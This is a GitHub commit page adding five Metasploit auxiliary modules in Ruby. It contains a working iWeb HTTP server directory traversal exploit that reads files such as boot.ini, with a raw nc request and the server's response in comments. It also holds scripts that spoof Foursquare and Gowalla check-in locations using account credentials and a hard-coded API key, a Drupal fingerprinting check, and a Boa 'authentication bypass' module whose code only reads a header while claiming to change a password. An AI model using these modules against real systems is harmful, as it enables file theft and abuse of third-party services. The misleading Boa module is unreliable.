Permalink
Browse files

some old modules

  • Loading branch information...
carnal0wnage committed Aug 24, 2011
1 parent e5fe99a commit a4a0287b038b313a1affc53cfb385bf7aa4e05f4
@@ -0,0 +1,65 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::WMAPScanServer
+ # Scanner mixin should be near last
+ #include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Boa Authentication Bypass Exploit',
+ 'Version' => '$Revision: $',
+ 'Description' => 'This module checks for your moms...',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://www.milw0rm.com/exploits/4542' ],
+ [ 'URL', 'http://www.securityfocus.com/archive/1/479434'],
+ ]
+ )
+
+end
+
+ def run
+
+
+ begin
+ res = send_request_raw({
+ 'version' => '1.1',
+ 'uri' => '/home/index.shtml',
+ 'method' => 'GET',
+ }, 10)
+
+ if (res and res.headers['Server'])
+ if res.headers['Server'] =~ /Boa/
+ print_status("#{datastore['RHOST']} is possibly vuln #{res.headers['Server']}\n Attempting to change password to blah:blah")
+ elsif
+ print_status("#{datastore['RHOST']} is not vuln #{res.headers['Server']}")
+ end
+
+ else
+ ''
+ end
+
+ end
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
+ puts e.message
+ end
+ end
+#end
+
@@ -0,0 +1,77 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::WMAPScanServer
+ # Scanner mixin should be near last
+ #include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Drupal Check',
+ 'Version' => '$Revision: $',
+ 'Description' => 'This module check for the existence of the Drupal CMS by using the Expires: Sun, 19 Nov 1978 05:00:00 GMT header value. This should identify Drupal 4.6 and above. You MUST set the VHOST to be the domain name for this to work.',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://www.lullabot.com/articles/is-site-running-drupal' ],
+ ]
+ )
+
+ register_options(
+ [
+ OptString.new('UserAgent', [true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
+ OptString.new('VHOST', [true, "The VHOST -- Must set for this module", 'www.google.com' ])
+ ], self.class)
+end
+
+ def run
+
+
+ begin
+ agent = datastore['UserAgent']
+ res = send_request_raw({
+ 'version' => '1.0',
+ 'uri' => '/',
+ 'method' => 'GET',
+ 'headers' =>
+ {
+ 'Accept' => '*/*',
+ 'Connection' => 'Keep-Alive',
+ }
+
+ }, 10)
+
+ if (res and res.headers['Expires'])
+ if res.headers['Expires'] =~ /Sun, 19 Nov 1978 05:00:00 GMT/
+ print_status("#{datastore['RHOST']} is running Drupal CMS\nServer response #{res.headers['Expires']}")
+ elsif
+ print_status("#{datastore['RHOST']} is not running Drupal CMS\nServer response #{res.headers['Expires']}")
+ end
+
+
+ else
+ ''
+ end
+
+ end
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
+ puts e.message
+ end
+ end
+#end
+
@@ -0,0 +1,75 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Foursquare Location Poster',
+ 'Version' => '$Revision:$',
+ 'Description' => 'Fuck with Foursquare, be anywhere you want to be by venue id',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://groups.google.com/group/foursquare-api' ],
+ [ 'URL', 'http://www.mikekey.com/im-a-foursquare-cheater/'],
+ ]
+ )
+#todo pass in geocoords instead of venueid, create a venueid, other tom foolery
+ register_options(
+ [
+ Opt::RHOST('api.foursquare.com'),
+ OptString.new('VENUEID', [ true, 'foursquare venueid', '185675']), #Louve Paris France
+ OptString.new('USERNAME', [ true, 'foursquare username', 'username']),
+ OptString.new('PASSWORD', [ true, 'foursquare password', 'password']),
+ ], self.class)
+
+ end
+
+ def run
+
+ begin
+ user = datastore['USERNAME']
+ pass = datastore['PASSWORD']
+ venid = datastore['VENUEID']
+ user_pass = Rex::Text.encode_base64(user + ":" + pass)
+ decode = Rex::Text.decode_base64(user_pass)
+ postrequest = "twitter=1\n" #add facebook=1 if you want facebook
+
+ print_status("Base64 Encoded User/Pass: #{user_pass}") #debug
+ print_status("Base64 Decoded User/Pass: #{decode}") #debug
+
+ res = send_request_cgi({
+ 'uri' => "/v1/checkin?vid=#{venid}",
+ 'version' => "1.1",
+ 'method' => 'POST',
+ 'data' => postrequest,
+ 'headers' =>
+ {
+ 'Authorization' => "Basic #{user_pass}",
+ 'Proxy-Connection' => "Keep-Alive",
+ }
+ }, 25)
+
+ print_status("#{res}") #this outputs entire response, could probably do without this but its nice to see whats going on
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE =>e
+ puts e.message
+ end
+end
+
+
@@ -0,0 +1,89 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Gowalla Location Poster',
+ 'Version' => '$Revision:$',
+ 'Description' => 'Fuck with Gowalla, be anywhere you want to be by spot id',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://groups.google.com/group/foursquare-api' ],
+ [ 'URL', 'http://www.mikekey.com/im-a-foursquare-cheater/'],
+ ]
+ )
+#todo pass in geocoords instead of venueid, create a venueid, other tom foolery
+ register_options(
+ [
+ Opt::RHOST('api.gowalla.com'),
+ OptString.new('UserAgent', [true, "Specify Gowalla UserAgent",'Gowalla/1.1 (unknown, Android, 4, android, 0.9.1, 320x480)']),
+ #OptString.new('UserAgent', [true, "Specify Gowalla UserAgent",'Gowalla/1.1 (unknown, Android, 4, android-devphone1/Android Dev Phone 1, 0.9.1-73-g59c95ca, 320x480)']),
+ OptString.new('SPOTID', [ true, 'gowalla spot id', '14515']), #Facebook HQ
+ OptString.new('USERNAME', [ true, 'gowalla username', 'username']),
+ OptString.new('PASSWORD', [ true, 'gowalla password', 'password']),
+ OptString.new('GPSLONGITUDE', [ true, 'GPS Longitude', '-122.1525514126']),
+ OptString.new('GPSLATITUDE', [ true, 'GPS Latitude', '37.4157602871']),
+ OptString.new('GOWALLAAPIKEY', [ true, 'gowalla API Key', '4a35a8b7df6a405a816b01cd5b44b95d']),
+ OptString.new('COMMENT', [ true, 'Comment', 'fooooood']),
+ ], self.class)
+
+ end
+
+ def run
+
+ begin
+ user = datastore['USERNAME']
+ pass = datastore['PASSWORD']
+ spotid = datastore['SPOTID']
+ lng = datastore['GPSLONGITUDE']
+ lat = datastore['GPSLATITUDE']
+ api = datastore['GOWALLAAPIKEY']
+ comment = datastore['COMMENT']
+
+ user_pass = Rex::Text.encode_base64(user + ":" + pass)
+ decode = Rex::Text.decode_base64(user_pass)
+ postrequest = "lng=#{lng}&accuracy=0.0&post_to_facebook=0&post_to_twitter=1&comment=#{comment}&lat=#{lat}\n"
+
+ print_status("Base64 Encoded User/Pass: #{user_pass}") #debug
+ print_status("Base64 Decoded User/Pass: #{decode}") #debug
+
+ res = send_request_cgi({
+ 'uri' => "/checkins?spot_id=#{spotid}",
+ 'version' => "1.1",
+ 'method' => 'POST',
+ 'data' => postrequest,
+ 'headers' =>
+ {
+ 'Authorization' => "Basic #{user_pass}",
+ 'X-Gowalla-API-Version' => "1",
+ 'Accept' => 'application/json',
+ 'Proxy-Connection' => "Keep-Alive",
+ 'X-Gowalla-API-Key' => "#{api}"
+ }
+ }, 25)
+
+ print_status("#{res}") #this outputs entire response, could probably do without this but its nice to see whats going on
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE =>e
+ puts e.message
+ end
+end
+
+
@@ -0,0 +1,77 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ # Scanner mixin should be near last
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'iWeb HTTP Server Directory Transversal Vulnerability',
+ 'Version' => '$Revision: $',
+ 'Description' => 'This modules exploits the iWeb HTTP Server Directory Transversal Vulnerability',
+ # some webcam shit has a similar Server Header see below for actual server header.
+ # default install path C:\Progam Files\Ashley Brown\iWeb\
+ 'Author' => 'CG' ,
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://packetstormsecurity.org/0912-exploits/iweb-traversal.txt' ],
+ [ 'BID', '37228' ],
+ [ 'URL', 'http://www.ashleybrown.co.uk/iweb/' ],
+ [ 'URL', 'http://www.exploit-db.com/exploits/10331' ]
+ ]
+ )
+ register_options(
+ [
+ OptString.new('FILE', [ true, "The file to view", 'boot.ini']),
+ OptString.new('TRAV', [ true, "Traversal Depth", '..%5C..%5C..%5C']),
+ ], self.class)
+ end
+
+ def run
+
+ begin
+ file = datastore['FILE']
+ trav = datastore['TRAV']
+ res = send_request_raw({
+ 'uri' => '/'+trav+file,
+ 'method' => 'GET'
+ }, 10)
+
+ if (res and res.code == 200)
+ print_status("Output Of Requested File:\n#{res.body}")
+ else
+ print_status("Received #{res.code} for #{trav}#{file}")
+ end
+
+ #rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ #rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+ end
+
+end
+
+# nc 172.16.10.132 80
+# GET ..%5C..%5C..%5Cboot.ini HTTP/1.0
+
+# HTTP/1.1 200 OK
+# LastModified: 12/22/2005 3:22:59 PM
+# Server: iWeb
+# Content-Length: 210
+
+# [boot loader]
+# timeout=30
+# default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
+# [operating systems]
+# multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect
Oops, something went wrong.

0 comments on commit a4a0287

Please sign in to comment.